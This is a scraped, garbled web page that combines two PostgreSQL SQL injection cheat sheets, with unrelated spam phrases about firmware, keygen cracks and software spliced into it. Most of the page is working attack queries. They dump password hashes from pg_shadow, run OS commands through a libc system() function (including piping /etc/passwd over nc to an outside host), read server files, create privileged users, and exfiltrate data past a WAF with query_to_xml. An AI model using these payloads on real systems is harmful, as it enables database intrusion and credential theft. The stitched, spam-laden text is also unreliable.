9 – SQL Injection Cheat Sheet. If you’re looking for an SQL Injection Cheat Sheet, here are some you can use: PortSwigger: NetSparker: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/. For more information, please read OWASP SQL Injection Prevention Cheat Sheet. Now, if you are an advanced user, start using this defense as you like, but, for beginners, if they can't quickly implement a stored procedure and prepared the statement, it's better to filter input data as much they can. Postgres Injection Cheat Sheet. Huawei t1 701u firmware version 5.0. Source: Version SELECT version Comments SELECT 1; –comment SELECT /.comment./1; Current User SELECT user; SELECT currentuser; SELECT sessionuser; SELECT usename FROM pguser; SELECT getpgusername; List Users.
Some useful syntax reminders for SQL Injection into PostgreSQL databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
Addintools classic menu for office 2007 keygen crack. The complete list of SQL Injection Cheat Sheets I’m working is: Free finite element analysis software for mac.
Sqli Cheat Sheet
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.
| Version | SELECT version() |
| Comments | SELECT 1; –comment SELECT /*comment*/1; |
| Current User | SELECT user; SELECT current_user; SELECT session_user; SELECT usename FROM pg_user; SELECT getpgusername(); |
| List Users | SELECT usename FROM pg_user |
| List Password Hashes | SELECT usename, passwd FROM pg_shadow — priv |
| Password Cracker | MDCrack can crack PostgreSQL’s MD5-based passwords. |
| List Privileges | SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user |
| List DBA Accounts | SELECT usename FROM pg_user WHERE usesuper IS TRUE |
| Current Database | SELECT current_database() |
| List Databases | SELECT datname FROM pg_database |
| List Columns | SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) |
| List Tables | SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid) |
| Find Tables From Column Name | If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’; |
| Select Nth Row | SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0 SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1; |
| Select Nth Char | SELECT substr(‘abcd’, 3, 1); — returns c |
| Bitwise AND | SELECT 6 & 2; — returns 2 SELECT 6 & 1; –returns 0 |
| ASCII Value -> Char | SELECT chr(65); |
| Char -> ASCII Value | SELECT ascii(‘A’); |
| Casting | SELECT CAST(1 as varchar); SELECT CAST(’1′ as int); |
| String Concatenation | SELECT ‘A’ || ‘B’; — returnsAB |
| If Statement | IF statements only seem valid inside functions, so aren’t much use for SQL injection. See CASE statement instead. |
| Case Statement | SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A |
| Avoiding Quotes | SELECT CHR(65)||CHR(66); — returns AB |
| Time Delay | SELECT pg_sleep(10); — postgres 8.2+ only CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep function. Taken from here . |
| Make DNS Requests | Generally not possible in postgres. However if contrib/dblinkis installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights): Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.net”. |
| Command Execution | CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080′); — priv, commands run as postgres/pgsql OS-level user |
| Local File Access | CREATE TABLE mydata(t text); COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user …’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time …’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time … DROP TABLE mytest mytest;Write to a file: CREATE TABLE mytable (mycol text); |
| Hostname, IP Address | SELECT inet_server_addr(); — returns db server IP address (or null if using local connection) SELECT inet_server_port(); — returns db server IP address (or null if using local connection) |
| Create Users | CREATE USER test1 PASSWORD ‘pass1′; — priv CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time |
| Drop Users | DROP USER test1; — priv |
| Make User DBA | ALTER USER test1 CREATEUSER CREATEDB; — priv |
| Location of DB files | SELECT current_setting(‘data_directory’); — priv SELECT current_setting(‘hba_file’); — priv |
| Default/System Databases | template0 template1 |
Tags: cheatsheet, database, pentest, postgresql, sqlinjection
Posted in SQL Injection
Injection SQL
Cheat Sheet
Here is some userfull commands to deal with SQL injection:
| Detail | SQL command |
|---|---|
| Version | SELECT version() |
| List Users | SELECT usename FROM pg_user |
| List users and passwords | SELECT usename, passwd FROM pg_shadow |
| List Privileges | SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user |
| Database Name | SELECT current_database() |
| List databases | SELECT datname FROM pg_database |
| List tables | SELECT table_name FROM information_schema.tables |
| List columns | SELECT column_name FROM information_schema.columns WHERE table_name='data_table' |
| Select nth row | SELECT .. LIMIT 1 OFFSET {n} |
| Concatenate strings in the same row | SELECT CONCAT(username, ', ', passwd) FROM pg_shadow |
| Concatenate column | SELECT string_agg(column_name, ', ') FROM information_schema.columns WHERE table_name='data_table' |
XML functions
query_to_xml and
The following functions map the contents of relational tables to XML values:
Postgresql Sql Injection Cheat Sheet 2019
With query_to_xml you can bypass WAF and exfiltrate the query results in asingle string:
Sql Injection Commands List
database_to_xml
The following function may be available and returns the entire current database:
Postgresql Sql Injection Cheat Sheet Download
The exploitation is as follow. Be careful the process may timeout or DOS theserver: